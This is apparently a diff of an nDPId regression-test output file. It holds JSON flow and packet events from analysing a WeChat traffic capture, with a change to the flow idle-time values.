+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1492167648873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167648873,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoAABAAEAGDtHAqAFny82eIqtLAbsShiV\/Tv6yylAQAOWcGwAA"} +01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}} +01570{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"thread_ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1492167650311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1492167650311,"pkt":"8IQvSpdgeJKcD6iOCABFAAA916xAAEAR3k3AqAFnwKgB\/uySADUAKTCBKzkBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"} 00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -291,79 +291,78 @@ 00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ssl.gstatic.com","user_agent":"Chrome\/57.0.2987.133 Linux x86_64"}} 00922{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1492167650348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAGCbiZAAEARRRnAqAFnrNkXQ4sRAbsBbnP9DSoBZwIONIO7UTAzNQLoUPe6\/kTOTlflPotTtybyc+JAmHNEvZwUaT+Y9MqSJDNXVlUHwBVN0wAQzobHU4rvOkVihYNG2ScjXRicw6QFTtMMe25DwzQ7F0UKP\/Y\/8HMbQmw9b+v7cjBNs8yLamuYyeUaQ6lA73AshAIuQPhL6IslIuIHWs+l0MLo2wd57CZSUFbeEQQGDWtD8b5mwEuaZ88hm8yA3WeZQ9Zu4UUro5Belh+M9DB8RCMbVDEQZk6oJR+FSwF3TriZCorpIzSRESc2crvu7FP1Tb9g0NyoL87e9cFlDFVypNQfdhNO+iEyVuMUtOGb6OQn1vrWvB\/icrLc4DopKhApNyBIG\/+MQmYuPalP+mCA4FXxaPeMi1RdjyuuqxJb39HK+6wmJsCzWDR6cvDTk6ywHmETP0AOjEu+QTifJk6chcMbgKmp0ErfBPvocLYD7Yj8Qw2lL48a1tEWZIz4lw=="} 02264{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1492167650401,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1492167650401,"pkt":"eJKcD6iO8IQvSpdgCABFoAViAABAADcRt7+s2RdDwKgBZwG7ixEFTkCsBPCmO80d\/CW5IJoqjbn6lzjr5TC1v3d2foeU3jLNcA4IAV35th92JTinR3E92La4uW3lsByHG3R1axVDDHGrIc2Dhs2S+7aBzkyVbwcuUK77hYdmfJ4TJuEFhTaYjceo9r51oYeJqOHOCc1BBmB5E+A58P\/H55fRg4dxRA9v1f2aVQ6I67HK4M7mS7147fzZ170E12rNhRLBsPAWwZ8U93ZWKjAcVK9waq7ihKZ\/GTyfNPuOCQnhcxCFRMVEx2xx65NSFauaw3a1qVgRV428j6Bchcyom0cvPgxBbWJUmObxkeqmQAFmTPCN6igcJnamWF5CRIXtlRtvIVi8G3Rds0EdWXNYvxaTSkwCziFaIH6mAaz9hCwjxATLUAdqd1Yo+wN5ikpGmpiBzh3Coj125lb7YXMKgdIF\/8K12iKaeICQ1ArpMEt9vvWxk35P363XmPN9SjUjvFqh8rl+ETiuGHzQwTYDZUwFRT8Tnc90FuuWkSHrjLuI78eE0u2MPArYDWbkXnAkM9f\/B1mpEGpwrQCQA0PHuwaHNDaEcqfk+htDhYfF2k76y25VNuFHeOfHnAe8W\/L6MSq0NvvJdxpclRqAM5S2hcBrDwho6FgiBa0XuPrQx61q\/3nmcTSWb0DXXos+FWaLGj1Jg4cyk4xSeKoZfxTTY8qOxPxWcSNcXXGMVMwz3NtJzwB28A6uPq8NBF+APnNiUzkLELf20sskbghw4Wvw2P5GvZ6Z0iUqrAzGSGc0IroovL34w3TMmjBnTPzAWKnwYJxIrcFH65r\/43AXULA7mwVKw7TuryWaAn8PVofDMn5VL+m8Bc4anaE3270Gx7DXXa3CWGylYl6IhspD51Ji7UqD6pJpDanmkxF7QRS0mZz7M+VCAuE5+TvKpba5WKwmCrXKMkHXnBfHSx4yC\/BngUmyj5AqU\/35FBtHK2MhZhT3uv3ixGib\/DhROgxNj\/fCIDmyLmZy6LuI15IWBQr2uiGWD15jLW9srpQ3r\/cpXrjFWrIOILP7BDqFX16AVMtIyhn8QUmpyMBzWR3rPBVnAwwCQUSi7lOuHYSBa2JAApapl8ibPeq+IESORJ2WC1jpiGlKVsyKHvCUxM4DB9CDGl+VMCLfBwTUsv9jC9A0oISxfI+skno\/pMiMhfE+1+tVpq0kVbytQk5I14sgZgoXLliJYkFCOr3ikDyMImPkBDegikF\/nhKUricS6KkRKOBVEDYofUgm6hebzs7TAwbIX0LHGrieMSNYdiZ\/RaP9BKZ7WUS7z8Jvlw3DtdXYHHGY\/9m62j8jgUA89FYp2sdoaRFheoQUmxEE6EpSZHWMo5+AT1rvxDTcNLYyAF\/NKlyP79gaAWae04vlwFQ4Bupkoby3AV8qNrlb42pc54gLBwr2\/V8SfP1Jf8GHKLnbnMMGzz8c8g08IQe\/1e7EH9oyogw0WeUU2ddyxaRPwa4eLAdObHTP\/jn7fsHAYVorRI56TLQ62d12KS2GZw3\/dElBm43NGOyNU1Hp381LUrTlDOWD2CkkP1QCRN+zezQnIAdftR9GtZfdliGgi4n+DRQuugUUjAENUiyLbjua9o3CfXKyGh5RlHt3r219Xp7bzpU2Sa3x2tOlotON5hkk2pmORaeO3NrbIHwpGOzFl20\/4Mhk6xhdUZeHJoEN7V1+kqNLH9CANDu7wpMSMlhqJfpnckBvaCh9BXX3VOJErUyDwJ\/yEG1ZNKGdvcDhAfCDrZsIbxElU8wBdoFg5g3GjSgWUZyHIUdESjz3nA05zyGh0UQ5UNTBZNmAzAGEZvPJPDUf"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167654504,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsBAAEAGBoXAqAFny82XotNaAbub+DW+SvgsEIARAOUK7AAAAQEICgAx4GBFrgFX"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1492167654504,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167654504,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsBAAEAGBoXAqAFny82XotNaAbub+DW+SvgsEIARAOUK7AAAAQEICgAx4GBFrgFX"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1492167669545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1492167669545,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwPUUAAIARd2TAqAFkwKgB\/wCKAIoA3H9oEQ7+\/cCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1492167690433,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167690433,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9oAAAEC8bHAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695237,"flow_last_seen":1492167695237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695237,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1492167695237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695237,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8M9xAAEAG4WDAqAFny82XotNlAbtEgzv7AAAAAKACchBSeAAAAgQFtAQCCAoAMggnAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695488,"flow_last_seen":1492167695488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1492167695488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695488,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8xuRAAEAGTljAqAFny82XotNmAbsIrs6CAAAAAKACchD7hQAAAgQFtAQCCAoAMghmAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702WgJJlmRIM7\/KASN8ga\/wAAAgQFoAQCCApF0vJmADIIJwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695562,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0M91AAEAG4WfAqAFny82XotNlAbtEgzv8oCSZZ4AQAOWASQAAAQEICgAyCHhF0vJm"} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1492167695854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695854,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702aaLHzgCK7Og6ASN8jmSwAAAgQFoAQCCApF0vKlADIIZgEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1492167695854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695854,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0xuVAAEAGTl\/AqAFny82XotNmAbsIrs6Dmix84YAQAOVLjAAAAQEICgAyCMFF0vKl"} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695237,"flow_last_seen":1492167695237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695237,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1492167695237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695237,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8M9xAAEAG4WDAqAFny82XotNlAbtEgzv7AAAAAKACchBSeAAAAgQFtAQCCAoAMggnAAAAAAEDAwc="} 